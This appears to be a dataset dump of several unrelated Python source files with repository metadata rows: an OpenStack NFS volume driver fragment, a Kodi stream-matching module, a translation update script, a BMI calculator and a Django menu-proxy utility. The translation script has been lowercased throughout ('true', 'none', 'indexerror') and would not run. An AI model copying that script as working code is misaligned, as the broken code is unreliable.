"""Create back-end to nfs."""
super(LibvirtNFSVolumeDriver,
self).__init__(connection, is_block_dev=False)
def _get_device_path(self, connection_info):
path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(connection_info['data']['export']))
path = os.path.join(path, connection_info['data']['name'])
return path
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtNFSVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = 'file'
conf.source_path = connection_info['data']['device_path']
conf.driver_format = connection_info['data'].get('format', 'raw')
return conf
def connect_volume(self, connection_info, disk_info):
"""Connect the volume. Returns xml for libvirt."""
options = connection_info['data'].get('options')
self._ensure_mounted(connection_info['data']['export'], options)
connection_info['data']['device_path'] = \
self._get_device_path(connection_info)
def disconnect_volume(self, connection_info, disk_dev):
"""Disconnect the volume."""
export = connection_info['data']['export']
mount_path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(export))
try:
utils.execute('umount', mount_path, run_as_root=True)
except processutils.ProcessExecutionError as exc:
if ('device is busy' in exc.message or
'target is busy' in exc.message):
LOG.debug("The NFS share %s is still in use.", export)
else:
LOG.exception(_LE("Couldn't unmount the NFS share %s"), export)
def _ensure_mounted(self, nfs_export, options=None):
"""@type nfs_export: string
@type options: string
"""
mount_path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(nfs_export))
if not libvirt_utils.is_mounted(mount_path, nfs_export):
self._mount_nfs(mount_path, nfs_export, options, ensure=True)
return mount_path
def _mount_nfs(self, mount_path, nfs_share, options=None, ensure=False):
"""Mount nfs export to mount path."""
utils.execute('mkdir', '-p', mount_path)
# Construct the NFS mount command.
nfs_cmd = ['mount', '-t', 'nfs']
if CONF.libvirt.nfs_mount_options is not None:
nfs_cmd.extend(['-o', CONF.libvirt.nfs_mount_options])
if options:
nfs_cmd.extend(options.split(' '))
nfs_cmd.extend([nfs_share, mount_path])
try:
utils.execute(*nfs_cmd, run_as_root=True)
except processutils.ProcessExecutionError as exc:
if ensure and 'already mounted' in exc.message:
LOG.warn(_LW("%s is already mounted"), nfs_share)
else:
raise
| apache-2.0 | -3,995,553,806,361,658,000 | 40.210784 | 79 | 0.591352 | false | 4.235264 | true | false | false |
Quihico/repository.spartacus | script.trtv/streaming.py | 1 | 24691 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2014 Sean Poyser and Richard Dean ([email protected]) - With acknowledgement to some original code by twinther (Tommy Winther)
#
import xbmc
from xml.etree import ElementTree
from xml.parsers.expat import ExpatError
import ConfigParser
import os
import re
import xbmcaddon
import urllib
import requests
import json
import dixie
ADDON = dixie.ADDON
SF_METALLIQ = dixie.GetSetting('SF_METALLIQ')
autoplay = dixie.GetSetting('autoplay')
LOCAL = dixie.GetSetting('local.ini') == 'true'
FTVINI = dixie.GetSetting('ftv.ini')
datapath = dixie.PROFILE
class StreamsService(object):
def __init__(self):
self.addonsParser = ConfigParser.ConfigParser(dict_type=OrderedDict)
self.addonsParser.optionxform = lambda option: option
iniFiles = self.getIniFiles()
for file in iniFiles:
try: self.addonsParser.read(file)
except: pass
def getIniFiles(self):
files = []
import glob
ini = os.path.join(datapath, 'ini', '*.*')
files = glob.glob(ini)
for i in range(10):
file = dixie.GetSetting('INI_%d' % i)
if len(file) > 0:
if file not in files:
files.append(file)
if os.path.exists(os.path.join(datapath,'addons.ini')):
files.append(os.path.join(datapath, 'addons.ini'))
return files
def loadFavourites(self):
entries = list()
path = xbmc.translatePath('special://profile/favourites.xml')
if os.path.exists(path):
f = open(path)
xml = f.read()
f.close()
try:
doc = ElementTree.fromstring(xml)
for node in doc.findall('favourite'):
value = node.text
value = node.text.replace(',return','')
if value[0:11] == 'PlayMedia("':
value = value[11:-2]
elif value[0:10] == 'PlayMedia(':
value = value[10:-1]
elif value[0:22] == 'ActivateWindow(10025,"':
value = value[22:-2]
elif value[0:21] == 'ActivateWindow(10025,':
value = value[22:-1]
elif value[0:22] == 'ActivateWindow(10001,"':
value = value[22:-2]
elif value[0:21] == 'ActivateWindow(10001,':
value = value[22:-1]
else:
continue
entries.append((node.get('name'), value))
except ExpatError:
pass
return entries
def loadPlaylist(self):
iptv_type = dixie.GetSetting('playlist.type')
IPTV_URL = '0'
IPTV_FILE = '1'
entries = list()
label = ''
value = ''
if iptv_type == IPTV_FILE:
path = os.path.join(dixie.GetSetting('playlist.file'))
else:
url = dixie.GetSetting('playlist.url')
path = os.path.join(datapath, 'playlist.m3u')
try:
request = requests.get(url)
playlist = request.content
with open(path, 'wb') as f:
f.write(playlist)
except: pass
if os.path.exists(path):
f = open(path)
playlist = f.readlines()
f.close()
for line in playlist:
if line.startswith('#EXTINF:'):
label = line.split(',')[-1].strip()
elif line.startswith('rtmp') or line.startswith('rtmpe') or line.startswith('rtsp') or line.startswith('http'):
value = line.replace('rtmp://$OPT:rtmp-raw=', '').replace('\n', '')
entries.append((label, value))
return entries
def locateSuperFavourites(self, title):
SUPERFAVES = 'plugin.program.super.favourites'
SF_INSTALLED = xbmc.getCondVisibility('System.HasAddon(%s)' % SUPERFAVES) == 1
if not SF_INSTALLED:
return None
sfAddon = xbmcaddon.Addon(id = SUPERFAVES)
# Detect the root folder for SF items, set to default if not already set
ROOT = sfAddon.getSetting('FOLDER')
if not ROOT:
ROOT = 'special://profile/addon_data/plugin.program.super.favourites'
folder = os.path.join(ROOT, 'Super Favourites')
items = []
self._locateSuperFavourites(title.upper(), folder, items)
return items
def _locateSuperFavourites(self, title, folder, items):
import sfile
import settings
import urllib
current, dirs, files = sfile.walk(folder)
for dir in dirs:
folder = os.path.join(current, dir)
# check against SF list, if it exists then match up
if dir.upper() == title:
# cfg = os.path.join(folder, 'folder.cfg')
# autoplay = settings.get('AUTOPLAY', cfg)
if autoplay == 'true':
uTitle = urllib.quote_plus(title)
mode = 5400
uFolder = urllib.quote_plus(folder)
toAdd = 'plugin://plugin.program.super.favourites/?label=%s&mode=%d&path=%s' % (uTitle, mode, uFolder)
else:
uTitle = urllib.quote_plus(title)
mode = 400
uFolder = urllib.quote_plus(folder)
toAdd = 'plugin://plugin.program.super.favourites/?label=%s&mode=%d&path=%s' % (uTitle, mode, uFolder)
toAdd = '__SF__ActivateWindow(10025,"%s",return)' % toAdd
xbmc.log('##### FOLDER: %s' % folder)
if os.path.exists(xbmc.translatePath(os.path.join(folder,'favourites.xml'))):
items.append(['SF_'+folder, toAdd])
self._locateSuperFavourites(title, folder, items)
def getAddons(self):
return self.addonsParser.sections()
def getAddonStreams(self, id):
return self.addonsParser.items(id)
def detectStream(self, channel, catchup=''):
"""
@param channel:
@type channel: source.Channel
"""
matches = list()
xbmc.log('CATCHUP: %s'%catchup)
# If user chooses to watch via catchup then call meta addons
if catchup != '':
catchup = catchup.replace(' ','+')
stream = ('plugin://plugin.video.metalliq/%s' % (catchup))
matches.append(('plugin.video.metalliq', 'Catchup', [str(stream)]))
# For a live tv selection grab valid ini files and present options
else:
# Get any Super Favourites with channel name
superFaves = self.locateSuperFavourites(channel.id)
xbmc.log('### SF: %s' % superFaves)
if superFaves:
if len(superFaves) == 1 and not '-metalliq' in superFaves[0][0]:
matches.append((superFaves[0][0], 'Social Share', superFaves[0][1]))
elif len(superFaves) == 1 and '-metalliq' in superFaves[0][0] and SF_METALLIQ == 'true':
matches.append((superFaves[0][0], 'MetalliQ', superFaves[0][1]))
else:
index = 0
for superFave in superFaves:
if '-metalliq' in superFave[0] and SF_METALLIQ == 'true':
label = 'MetalliQ'
matches.append((superFave[0], label, superFave[1]))
elif not '-metalliq' in superFave[0]:
if len(superFaves) == 2 and ('-metalliq' in superFaves[0][0] or '-metalliq' in superFaves[1][0]):
label = 'Social Share'
else:
index += 1
label = 'Social Share (%d)' % index
matches.append((superFave[0], label, superFave[1]))
# Get any Add-ons with channel name
for id in self.getAddons():
try:
xbmcaddon.Addon(id)
except Exception:
pass # ignore addons that are not installed
for (label, stream) in self.getAddonStreams(id):
label = label.upper()
label_temp = label.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(label_temp) > 9:
label_temp = label_temp.replace('CINEMA','').replace('MOVIES','')
channel.title = channel.title.upper().replace('_',' ')
channel_temp = channel.title.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(channel_temp) > 9:
channel_temp = channel_temp.replace('CINEMA','').replace('MOVIES','')
# If meta is chosen we clean the name up a bit more
if SF_METALLIQ == 'false':
if id == "plugin.video.metalliq" or id == "plugin.video.meta":
label = channel.title
chanx = channel.title.replace(" ","+").replace("_","+")
if chanx.endswith("%20HDTV"):
chanx = chanx.replace("%20HDTV","")
if chanx.endswith("%20HD"):
chanx = chanx.replace("%20HD","")
if chanx.endswith("%20PLUS1"):
chanx = chanx.replace("%20PLUS1","")
stream = str(stream.replace("<channel>",'live/%s/None/en'% chanx))
xbmc.log('STREAM: %s'%stream)
if type(stream) is list:
stream = stream[0]
if (channel_temp in label_temp) or (label_temp in channel_temp):
# Workaround for getting clean id if ini contains badly formatted items
if stream.startswith('plugin://') and not 'plugin.program.super.favourites' in stream:
idtemp = stream.split('plugin://')[1]
xbmc.log('idtemp: %s' % idtemp)
id = idtemp.split('/')[0]
# Clean up badly formatted labels in the ini files
label = re.sub('[:\\/?\<>|"]', '', label)
label = label.strip()
try:
label = label.encode('ascii', 'ignore')
except:
try:
label = label.decode('utf-8').encode('ascii', 'ignore')
except:
label = label
matches.append((id, label, stream))
# Get any Kodi Favourites with channel name
kodiFaves = self.loadFavourites()
if kodiFaves:
id = 'kodi-favourite'
for (label, stream) in kodiFaves:
label = label.upper()
label_temp = label.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(label_temp) > 9:
label_temp = label_temp.replace('CINEMA','').replace('MOVIES','')
channel.title = channel.title.upper()
channel_temp = channel.title.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(channel_temp) > 9:
channel_temp = channel_temp.replace('CINEMA','').replace('MOVIES','')
if (channel_temp in label_temp) or (label_temp in channel_temp):
matches.append((id, label, stream))
# Get any Playlist entries with channel name
iptvPlaylist = self.loadPlaylist()
if iptvPlaylist:
id = 'iptv-playlist'
for (label, stream) in iptvPlaylist:
label = label.upper()
label_temp = label.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(label_temp) > 9:
label_temp = label_temp.replace('CINEMA','').replace('MOVIES','')
channel.title = channel.title.upper()
channel_temp = channel.title.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(channel_temp) > 9:
channel_temp = channel_temp.replace('CINEMA','').replace('MOVIES','')
if (channel_temp in label_temp) or (label_temp in channel_temp):
matches.append((id, label, stream))
# Get entries from PVRchannels with channel name
import pvr
PVRchannels = pvr.getPVRChannels()
if PVRchannels:
id = 'xbmc.pvr'
for (label, stream) in PVRchannels:
label = label.upper()
label_temp = label.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(label_temp) > 9:
label_temp = label_temp.replace('CINEMA','').replace('MOVIES','')
channel.title = channel.title.upper()
channel_temp = channel.title.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(channel_temp) > 9:
channel_temp = channel_temp.replace('CINEMA','').replace('MOVIES','')
if (channel_temp in label_temp) or (label_temp in channel_temp):
matches.append((id, label, stream))
xbmc.log('### matches length: %s' % len(matches))
# if len(matches) == 1:
# return [matches[0][0],matches[0][1],str(matches[0][2])]
# else:
return matches
class OrderedDict(dict):
# From: http://code.activestate.com/recipes/576693/
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
| gpl-2.0 | 8,102,808,333,039,620,000 | 40.849153 | 403 | 0.507108 | false | 4.081832 | false | false | false |
moorecoin/MooreCoinMiningAlgorithm | contrib/devtools/update-translations.py | 1 | 6779 | #!/usr/bin/python
# copyright (c) 2014 wladimir j. van der laan
# distributed under the mit software license, see the accompanying
# file copying or http://www.opensource.org/licenses/mit-license.php.
'''
run this script from the root of the repository to update all translations from
transifex.
it will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
todo:
- auto-add new translations to the build system according to the translation process
'''
from __future__ import division, print_function
import subprocess
import re
import sys
import os
import io
import xml.etree.elementtree as et
# name of transifex tool
tx = 'tx'
# name of source language file
source_lang = 'moorecoin_en.ts'
# directory with locale files
locale_dir = 'src/qt/locale'
def check_at_repository_root():
if not os.path.exists('.git'):
print('no .git directory found')
print('execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([tx, 'pull', '-f']):
print('error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''find all format specifiers in a string.'''
pos = 0
specifiers = []
while true:
percent = s.find('%', pos)
if percent < 0:
break
specifiers.append(s[percent+1])
pos = percent+2
return specifiers
def split_format_specifiers(specifiers):
'''split format specifiers between numeric (qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# numeric (qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
def sanitize_string(s):
'''sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
except indexerror:
errors.append("parse error in translation '%s'" % sanitize_string(translation))
return false
else:
if source_f != translation_f:
errors.append("mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
return false
return true
def all_ts_files(suffix=''):
for filename in os.listdir(locale_dir):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == source_lang+suffix:
continue
if suffix: # remove provided suffix
filename = filename[0:-len(suffix)]
filepath = os.path.join(locale_dir, filename)
yield(filename, filepath)
fix_re = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''remove invalid characters from translation string'''
return fix_re.sub(b'', s)
# override cdata escape function to make our output match qt's (optional, just for cleaner diffs for
# comparison, disable by default)
_orig_escape_cdata = none
def escape_cdata(text):
text = _orig_escape_cdata(text)
text = text.replace("'", ''')
text = text.replace('"', '"')
return text
def postprocess_translations(reduce_diff_hacks=false):
print('checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = et._escape_cdata
et._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
have_errors = false
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
parser = et.xmlparser(encoding='utf-8') # need to override encoding because 'utf8' is not understood only 'utf-8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the xml parser will fail
data = remove_invalid_characters(data)
tree = et.parse(io.bytesio(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
if translation is none:
continue
errors = []
valid = check_format_specifiers(source, translation, errors)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
have_errors = true
# remove location tags
for location in message.findall('location'):
message.remove(location)
# remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# write fixed-up tree
# if diff reduction requested, replace some xml to 'sanitize' to qt formatting
if reduce_diff_hacks:
out = io.bytesio()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
fetch_all_translations()
postprocess_translations()
| mit | -6,915,173,566,015,647,000 | 35.446237 | 121 | 0.618675 | false | 4.169127 | false | false | false |
kssim/efp | making_decisions/python/bmi_calculator.py | 1 | 1254 | # Pratice 19. BMI Calculator
# Output:
# Your BMI is 19.5.
# You are within the ideal weight range.
# Or
# Your BMI is 32.5.
# You are overweight. You should see your doctor.
# Formula:
# bmi = (weight / (height x height)) x 703
# Standard:
# BMI 18.5 ~ 25 is nomal weight.
# Constraint:
# - Ensure your program takes only numeric data.
# Don't let the user continue unless the data is valid.
#!/usr/bin/env python
from __future__ import division
import sys
def input_process(in_question):
return input(in_question) if sys.version_info >= (3,0) else raw_input(in_question)
if __name__ == '__main__':
try:
weight = int(input_process('What is your weight(pound)? '))
height = int(input_process('What is your height(inch)? '))
except:
print ('You must input only numbers.')
else:
bmi_convert_value = 703
bmi_raw_data = float(weight / (height * height))
bmi = bmi_raw_data * bmi_convert_value
print ('Your BMI is %s' % bmi)
if bmi < 18.5:
print ('You are within the ideal weight range.')
elif bmi > 25:
print ('You are overweight. You should see your doctor.')
else:
print ('You are nomal weight.')
| mit | -8,714,691,810,336,679,000 | 28.162791 | 86 | 0.606858 | false | 3.352941 | false | false | false |
redsolution/django-menu-proxy | menuproxy/utils.py | 1 | 10086 | # -*- coding: utf-8 -*-
from django import conf
from django.core.cache import cache
from importpath import importpath
METHODS = (
'replace', # Указывает, что объект point следует заменить объектом object
'insert', # Указывает, что к списку дочерних элементов inside-правила нужно добавить элемент object
'children', # Указывает, что к списку дочерних элементов inside-правила нужно добавить дочерние элементы object-а
)
def get_title(menu_proxy, object):
"""Correct value returned by menu_proxy.title function"""
result = menu_proxy.title(object)
if result is None:
return u''
return unicode(result)
def get_url(menu_proxy, object):
"""Correct value returned by menu_proxy.url function"""
result = menu_proxy.url(object)
if result is None:
return u''
return unicode(result)
def get_ancestors(menu_proxy, object):
"""Correct value returned by menu_proxy.ancestors function"""
result = menu_proxy.ancestors(object)
if result is None:
return []
return [value for value in result]
def get_children(menu_proxy, object, lasy):
"""
Call ``children`` or ``lasy_children`` function for ``menu_proxy``.
Pass to it ``object``.
Correct result.
"""
if lasy:
result = menu_proxy.lasy_children(object)
else:
result = menu_proxy.children(object)
if result is None:
return []
return [value for value in result]
class DoesNotDefined(object):
"""
Class to indicate that value was not pressend in rule.
"""
pass
def try_to_import(value, exception_text):
"""
If ``value`` is not None and is not DoesNotDefined
then try to import specified by ``value`` path.
"""
if value is not DoesNotDefined and value is not None:
return importpath(value, exception_text)
return value
def get_rules():
"""Return dictionary of rules with settings"""
rules = cache.get('menuproxy.rules', None)
if rules is not None:
return rules
rules = {}
sequence = {None: []}
def add_to_sequence(rule, value):
if rule not in sequence:
sequence[rule] = []
sequence[rule].append(value)
rules[None] = MenuRule(name=None, method='replace', proxy=None, rules=rules)
for kwargs in getattr(conf.settings, 'MENU_PROXY_RULES', []):
rule = MenuRule(rules=rules, **kwargs)
rules[rule.name] = rule
add_to_sequence(rule.name, rule.name)
add_to_sequence(rule.inside, rule.name)
for name, rule in rules.iteritems():
rule.sequence = [rules[item] for item in sequence[name]]
cache.set('menuproxy.rules', rules)
return rules
def get_front_page(rules):
"""If MENU_PROXY_FRONT_PAGED is True and there is front page return MenuItem for it"""
front_page = cache.get('menuproxy.front_page', DoesNotDefined)
if front_page is not DoesNotDefined:
return front_page
front_page = None
if getattr(conf.settings, 'MENU_PROXY_FRONT_PAGED', True):
root = MenuItem(None, DoesNotDefined)
children = root.children(False)
if children:
front_page = children[0]
cache.set('menuproxy.front_page', front_page)
return front_page
class MenuRule(object):
"""Rule"""
def __init__(self, name, method, proxy, rules, inside=None,
model=DoesNotDefined, point=DoesNotDefined, object=DoesNotDefined,
point_function=DoesNotDefined, object_function=DoesNotDefined, **other):
self.name = name
self.method = method
assert self.method in METHODS, 'menuproxy does`t support method: %s' % self.method
self.inside = inside
self.model = try_to_import(model, 'model class')
self.point = try_to_import(point, 'mount point')
if callable(self.point) and self.point is not DoesNotDefined:
self.point = self.point()
if self.point is DoesNotDefined:
self.point_function = try_to_import(point_function, 'mount point function')
else:
self.point_function = DoesNotDefined
self.object = try_to_import(object, 'mount object')
if callable(self.object) and self.object is not DoesNotDefined:
self.object = self.object()
if self.object is DoesNotDefined:
self.object_function = try_to_import(object_function, 'mount object function')
else:
self.object_function = DoesNotDefined
self.proxy = try_to_import(proxy, 'MenuProxy class')
other.update(self.__dict__)
if callable(self.proxy) and self.proxy is not DoesNotDefined:
self.proxy = self.proxy(**other)
self.rules = rules
self.sequence = []
def _get_point(self, object, forward):
if self.point is not DoesNotDefined:
return self.point
elif self.point_function is not DoesNotDefined:
return self.point_function(object, forward)
else:
return DoesNotDefined
def _get_object(self, object, forward):
if self.object is not DoesNotDefined:
return self.object
elif self.object_function is not DoesNotDefined:
return self.object_function(object, forward)
else:
return DoesNotDefined
def forward_point(self, object):
return self._get_point(object, True)
def backward_point(self, object):
return self._get_point(object, False)
def forward_object(self, object):
return self._get_object(object, True)
def backward_object(self, object):
return self._get_object(object, False)
class MenuItem(object):
"""Objects of this class will be send to templates. Class provide to walk through nested rules"""
active = False
current = False
def __init__(self, name=None, object=None):
if isinstance(object, MenuItem):
self.rules = object.rules
self.name, self.object = object.name, object.object
else:
self.rules = get_rules()
for rule in self.rules[name].sequence:
if rule.name != name and rule.method == 'replace':
point = rule.forward_point(object)
if point is DoesNotDefined or point == object:
self.name, self.object = rule.name, rule.forward_object(object)
break
else:
self.name, self.object = name, object
self.front_paged_ancestors = False
def title(self):
"""Returns title for object"""
if hasattr(self, '_title'):
return getattr(self, '_title')
title = get_title(self.rules[self.name].proxy, self.object)
setattr(self, '_title', title)
return title
def url(self):
"""Returns url for object"""
if hasattr(self, '_url'):
return getattr(self, '_url')
url = get_url(self.rules[self.name].proxy, self.object)
setattr(self, '_url', url)
return url
def ancestors(self):
"""Returns ancestors for object, started from top level"""
if hasattr(self, '_ancestors'):
return getattr(self, '_ancestors')
ancestors = []
name = self.name
object = self.object
while True:
items = get_ancestors(self.rules[name].proxy, object)
until = self.rules[name].backward_object(object)
items.reverse()
for item in items:
ancestors.insert(0, MenuItem(name, item))
if item == until:
break
method, object, name = self.rules[name].method, self.rules[name].backward_point(object), self.rules[name].inside
if name is None:
break
if method != 'replace':
ancestors.insert(0, MenuItem(name, object))
front_page = get_front_page(self.rules)
if front_page is not None:
if not ancestors or ancestors[0].object != front_page.object:
if (front_page.name, front_page.object) != (self.name, self.object):
self.front_paged_ancestors = True
ancestors.insert(0, front_page)
setattr(self, '_ancestors', ancestors)
return ancestors
def ancestors_for_menu(self):
"""
Returns ancestors for show_menu tags.
